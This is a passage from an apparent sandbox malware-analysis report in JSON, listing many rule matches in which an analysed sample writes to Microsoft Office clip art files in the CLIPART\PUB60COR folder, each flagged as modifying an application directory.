office\\clipart\\pub60cor\\j0174315.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36393", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36400", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36407", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36414", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36434", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36452", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36465", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36476", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36485", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36494", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36503", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36512", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36521", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36532", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36550", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182888.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36559", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182898.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36566", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182902.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36573", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182946.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36580", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183172.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36589", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183174.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36598", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183198.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36607", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0183574.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36616", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185670.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36623", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185774.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36632", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36641", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185778.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36650", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36663", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36674", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_36683", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf\".", 